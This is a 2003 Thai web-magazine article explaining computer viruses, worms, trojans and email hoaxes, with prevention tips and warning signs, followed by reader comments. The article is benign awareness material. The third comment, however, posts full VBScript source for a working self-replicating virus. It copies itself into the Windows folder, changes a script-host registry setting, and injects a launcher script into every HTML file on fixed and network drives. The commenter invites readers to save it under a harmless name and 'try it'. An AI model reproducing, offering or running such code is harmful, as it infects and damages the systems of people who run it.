นิตยสารรายสะดวก  Articles  ๐๙ ธันวาคม ๒๕๔๖
ทำความรู้จักกับไวรัส หนอน โทรจันและ Hoax
ซัดดัม
... ทำ​​ความรู้จัก​​กับไวรัส หนอน โทรจัน​​และ Hoax รู้จักผู้บุกรุกประเภทต่างๆ​​ ​​เมื่อไรถึง​​จะเรียกว่าไวรัส ​​เมื่อไรถึง​​จะเรียก...
ทำ​ความรู้จัก​กับไวรัส หนอน โทรจัน​และ Hoax

รู้จักผู้บุกรุกประเภทต่างๆ​ ​เมื่อไรถึง​จะเรียกว่าไวรัส ​เมื่อไรถึง​จะเรียกหนอน ​และ ?.. ไวรัส (Viruses) ​คือโปรแกรมคอมพิวเตอร์ประเภทหนึ่ง​​ที่ถูกออกแบบมาให้แพร่กระจายตัวเองจากไฟล์หนึ่ง​​ไปยังไฟล์อื่นๆ​ ภายในเครื่องคอมพิวเตอร์ ไวรัส​จะแพร่กระจายตัวเองอย่างรวดเร็ว​ไปยังทุกไฟล์ภายในคอมพิวเตอร์ หรืออาจ​จะทำให้ไฟล์เอกสารติดเชื้ออย่างช้าๆ​ ​แต่ ไวรัส​จะไม่​สามารถแพร่กระจายจากเครื่องหนึ่ง​​ไปยังอีกเครื่องหนึ่ง​​ได้ด้วยตัวมันเอง ​โดยทั่ว​ไปเกิดจากการ​ที่ผู้​ใช้​เป็นพาหะ นำไวรัสจากเครื่องหนึ่ง​​ไปยังอีกเครื่องหนึ่ง​ เช่นเวลา​ที่ส่ง E-mail ​โดยแนบเอกสาร หรือไฟล์​ที่มีไวรัส​ไปด้วย, การทำสำเนาไฟล์​ที่ติดไวรัส​ไปไว้บนไฟล์เซริฟเวอร์, การแลกเปลี่ยนไฟล์​โดย​ใช้แผ่นดิสก์เก็ต ​เมื่อผู้​ใช้ทั่ว​ไปรับไฟล์ หรือดิสก์มา​ใช้งาน ไวรัสก็​จะแพร่กระจายภายในเครื่อง ​และ​จะ​เป็นวงจรในลักษณะนี้ต่อ​ไป

หนอน (Worms) ในอีก​ความหมายหนึ่ง​ ​เป็นสิ่ง​ที่อันตรายต่อระบบมาก (​สามารถทำ​ความเสียหายต่อระบบ​ได้จากภายใน เหมือน​กับหนอน​ที่กัดกินผลไม้จากภายใน) ​โดยทั่ว​ไปก็​จะคล้าย​กับไวรัสคอมพิวเตอร์ ​และด้วยการอาศัยพฤติกรรมการทำงานของมนุษย์ยุค IT ในการแพร่กระจายตัวเอง​ไปยังเครื่องคอมพิวเตอร์เครื่องอื่น หนอนร้าย​เป็นโปรแกรมคอมพิวเตอร์​ที่ถูกออกแบบมาให้​สามารถแพร่กระจายตัวเองจากเครื่องคอมพิวเตอร์เครื่องหนึ่ง​ ​ไปยังอีกเครื่องหนึ่ง​​โดยอาศัยระบบเน็ตเวิร์ค (E-mail) ​ซึ่งการแพร่กระจาย​สามารถทำ​ได้ด้วยตัวของมันเอง ​ซึ่ง​จะแพร่กระจาย​ได้อย่างรวดเร็ว​และทำ​ความเสียหายรุนแรงกว่าไวรัสมาก

โทรจัน (Trojan) ชื่อ​ที่คุ้นหูจากมหากาพย์เมืองทรอยในอดีตของโฮมเมอร์ ถูกนำมา​ใช้​เป็นชื่อของโปรแกรมคอมพิวเตอร์​ที่ถูกออกแบบมาให้แฝงตัวเองเข้า​ไปในระบบ​และ​จะทำงาน​โดยการดักจับ​เอารหัสผ่านเข้าสู่ระบบต่างๆ​ ​และส่งกลับ​ไปยังผู้ประสงค์ร้าย ​เพื่อเข้า​ใช้หรือโจมตีระบบในภายหลัง ​ซึ่งแฝงมาในหลายๆ​ รูปแบบ เช่นเกมส์ การ์ดอวยพร หรือจดหมายต่างๆ​ โปรแกรมโทรจัน ไม่​ได้ถูกออกแบบมา​เพื่อทำลายระบบ หรือสร้าง​ความเสียหายต่อระบบ คอมพิวเตอร์ โทรจันต่างจาก ไวรัส ​และหนอน​คือมันไม่​สามารถทำสำเนาตัวเอง​และแพร่กระจายตัวเอง​ได้ ​แต่มัน​สามารถ​ที่​จะอาศัยตัวกลาง ​ซึ่งอาจ​เป็นโปรแกรมต่างๆ​ จดหมาย หรือการ​ไปโหลดไฟล์จากแหล่งต่างๆ​ ​เมื่อเรียก​ใช้งานไฟล์เหล่านี้ โทรจันก็​จะทำงาน​และ​จะเปิดช่องทางต่างๆ​ให้ผู้บุกรุกเข้าโจมตีระบบ​ได้ ดังเช่น​ที่พวกกรีกทำ​กับชาวเมืองทรอย​เมื่อครั้งอดีต

ข่าวไวรัสหลอกลวง (Hoax) ​เป็นรูปแบบหนึ่ง​​ที่มีผลต่อผู้​ใช้คอมพิวเตอร์จำนวนมาก ​โดยไวรัสหลอกลวงพวกนี้​จะมาในรูปของจดหมายอิเล็กทรอนิกส์ การส่งข้อ​ความต่อๆ​กัน​ไปผ่านทางโปรแกรมรับส่งข้อ​ความ หรือห้องสนทนาต่างๆ​ ​ซึ่ง​สามารถสร้าง​ความวุ่นวายให้เกิดขึ้น​​ได้มากหรือน้อยเพียงใด ก็ขึ้น​​กับเทคนิค ​และการ​ใช้จิตวิทยาของผู้สร้างข่าวขึ้น​มา ​โดย​ส่วนใหญ่จดหมายประเภทนี้​จะมีหัวข้อ​ที่ชวนเชื่อ อ้างแหล่งข้อมูล ​และบริษัทใหญ่ๆ​​เป็นการสร้าง​ความเชื่อมั่น ​และ​เมื่อผู้รับส่งต่อ​ไปยัง​เพื่อนสนิท ​และคนคุ้นเคย ก็ยิ่งสร้าง​ความเชื่อมั่นมากขึ้น​ จากนั้น​ผู้รับก็​จะทำตัว​เป็นผู้ส่งต่อๆ​ ​ไปอีกหลายๆ​ทอด ​ซึ่ง​เป็นลักษณะเด่นของไวรัสหลอกลวง หาก​ได้รับจดหมายประเภทนี้ก็ไม่ควร​ที่​จะส่ง​ไปต่อๆ​ หรือควรเช็คจากแหล่งข้อมูล​ที่ถูก​ต้องก่อนทำการส่งต่อ​ไป

ข้อควรปฏิบัติในการป้องกันไวรัส

ตรวจสอบ E-mail ทุกฉบับ​​ที่ส่งเข้ามา ว่ามาจากบุคคล​ที่รู้จักหรือไม่ ข้อมูลต้นทาง ​และปลายทางของ E-mail ถูก​ต้องมีหัวข้อเรื่อง​​ที่ติดต่อชัดเจน (หากไม่แน่ใจให้สงสัยไว้ก่อน)
หากมีไฟล์แนบมา​กับ e-mail ​จะ​ต้องทำการ SCAN ตรวจหาไวรัสก่อนการ​ใช้งานทุกครั้ง

เอกสาร Word Excel อาจมีไวรัสประเภท Macro Virus แฝงมา​ได้
ไฟล์จำพวก . COM, .EXE, ZIP หรืออื่นๆ​ อาจมีไวรัสประเภท Worm, Trojan หรืออื่นๆ​​ได้
ระวังไฟล์ Happyxxx.COM, .EXE, PICS4YOU.EXE หรืออื่นๆ​​ที่น่าสงสัย

ตรวจสอบทุกครั้ง​เมื่อมีการนำ​เอาไฟล์ข้อมูล โปรแกรมต่างๆ​ จากเครื่องอื่น หรือแหล่งอื่นมา​ใช้งาน (การโหลดโปรแกรมจากอินเตอร์เน็ต, การแชร์ดิสก์, การแลกเปลี่ยนข้อมูลข้ามเครื่อง ข้ามฝ่าย)

Update Virus Definition อยู่​เสมอ (ระยะนี้ควรทำทุกสัปดาห์)

สำรองข้อมูลตามคำแนะนำของเจ้าหน้า​ที่ระบบคอมพิวเตอร์อย่างเคร่งครัด

อาการ​ที่น่าสงสัย


​เมื่อมีการบู๊ตระบบแล้ว​ระบบไม่​สามารถบู๊ต​ได้ตามปกติ มีข้อ​ความเตือนเช่น "CMOS Check sum Error" (ข้อ​ความเตือนนี้ ​สามารถเกิด​ได้จากเหตุอื่นด้วยเช่น Battery หมด)

เปิดเครื่องแล้ว​จอมืด​เป็นเวลานาน (รีเซ็ทแล้ว​ก็ไม่ทำงาน)

​เมื่อมีการบู๊ต​และเข้าสู่ระบบ ​ระหว่าง​ที่รอวินโดว์ปรากฏข้อ​ความ​ที่ไม่คุ้นเคยปรากฏขึ้น​มา

ไฟล์ Autoexec.bat ถูกแก้ไขใหม่

หมายเหตุ หากไม่แน่ใจให้ติดต่อเจ้าหน้า​ที่ระบบคอมพิวเตอร์ อย่าเพิ่งด่วนสรุปว่าเกิดจากไวรัส ไวรัสคอมพิวเตอร์​จะไม่​สามารถทำลายข้อมูล ​และสร้าง​ความเสียหายต่อระบบ​ได้ หากผู้​ใช้คอมพิวเตอร์ทุกคนมีวินัยในการ​ใช้งานระบบคอมพิวเตอร์"

 

F a c t   C a r d
Article ID A-323 Article's Rate 21 votes
ชื่อเรื่อง ทำความรู้จักกับไวรัส หนอน โทรจันและ Hoax
ผู้แต่ง ซัดดัม
ตีพิมพ์เมื่อ ๐๙ ธันวาคม ๒๕๔๖
ตีพิมพ์ในคอลัมน์ เกี่ยวกับคอมพิวเตอร์
จำนวนผู้เปิดอ่าน ๒๑๗๐ ครั้ง
จำนวนความเห็น ๓ ความเห็น
จำนวนดอกไม้รวม ๗๔
| | | |
เชิญโหวตให้เรตติ้งดอกไม้แก่ข้อเขียนนี้  
R e a d e r ' s   C o m m e n t
ความเห็นที่ ๑ : ศาลานกน้อย [C-967 ], [000.000.000.000]
เมื่อวันที่ : 02 ธ.ค. 2546, 00.40 น.

ผู้อ่าน​ที่รัก,

นิตยสารรายสะดวก​ ​และผู้เขียนยินดีรับฟัง​ความคิดเห็นต่อข้อเขียนชิ้นนี้
เชิญคลิกแสดง​ความเห็น​ได้​โดยอิสระ ขอขอบคุณ​และรู้สึก​เป็นเกียรติอย่างยิ่ง ในการมี​ส่วนร่วมของท่านในครั้งนี้...​

แจ้งลบข้อความ


ความเห็นที่ ๒ : HIHO [C-980 ], [203.107.130.10]
เมื่อวันที่ : 10 ธ.ค. 2546, 12.29 น.

เพิ่ง​จะฉลาดก็วันนี้แหล่ะค่ะ​ ขอบคุณมากค่าาา (มันต่างกันขนาดนี้เลย​เหรอ???)

แจ้งลบข้อความ


ความเห็นที่ ๓ : parktesla [C-12458 ], [61.19.114.101]
เมื่อวันที่ : 30 ส.ค. 2550, 08.49 น.

บันทึกว่า htmltest.vbs แล้ว​ลองเล่นดู​ได้เลย​
*************************************************
Dim fs,sh,a,codem
Set fs=CreateObject("scripting.filesystemobject")
Set sh=createobject("wscript.shell")
sh.regwrite"HKEY_CURRENT_USERSoftwareMicrosoftWindows Script HostSettingsTimeout",0,"REG_DWORD"
Set a=fs.OpenTextFile(WScript.ScriptFullName,1)
codem=a.ReadAll
Set a=fs.CreateTextFile(fs.GetSpecialFolder(0)&""&WScript.ScriptName)
a.Write codem
a.Close
d()
Sub d()
Dim d
For Each d In fs.Drives
If d.DriveType=2 Or d.DriveType=3 Then
fileB(d.Path&"")
fileA(d.Path&"")
End if
Next
End Sub
Sub fileA(f)
Dim fd,gf
Set gf=fs.GetFolder(f)
For Each fd In gf.SubFolders
fileB(fd.Path)
fileA(fd.Path)
Next
End Sub
Sub fileB(f)
Dim f2,gf,ext,w,codeh
Set gf=fs.GetFolder(f)
codeh=vbcrlf&"<script language="&Chr(34)&"vbscript"&Chr(34)&">"&vbCrLf&"<!--"&vbCrLf&"rem Created by parktesla"&vbCrLf&"Dim sh"&vbCrLf&"set sh=createobject("&Chr(34)&"wscript.shell"&Chr(34)&")"&vbCrLf&"sh.run"&Chr(34)&fs.GetSpecialFolder(0)&""&WScript.ScriptName&Chr(34)&vbCrLf&"-->"&vbCrLf&"</script>"
For Each f2 In gf.Files
ext =fs.GetExtensionName(f2.Path)
If LCase(ext)="htt" Or LCase(ext)="htm" Or LCase(ext)="html" then
Set w=fs.OpenTextFile(f2.Path,8)
w.Write codeh
w.Close
End if
Next
End Sub

แจ้งลบข้อความ


สั่งให้ระบบส่งเมลแจ้งการเพิ่มเติมความเห็น
 ศาลานกน้อย พร้อมบริการเสมอ และยินดีรับฟังข้อเสนอแนะจากทุกท่าน  ติดต่อเว็บมาสเตอร์ได้ทางคอลัมน์ คุยกับลุงเปี๊ยก หรือทางอีเมลได้ที่ uncle-piak@noknoi.com  พัฒนาระบบ : ธีรพงษ์ สุทธิวราภิรักษ์  โลโกนกน้อย : สุชา สนิทวงศ์  ภาพดอกไม้ในนกแชท : ณัฐพร บุญประภา  ลิขสิทธิ์งานเขียนในนิตยสารรายสะดวก เป็นของผู้เขียนเรื่องนั้น  ข้อความที่โพสบนเว็บไซต์แห่งนี้ เป็นความคิดเห็นส่วนตัวของผู้โพสทั้งสิ้น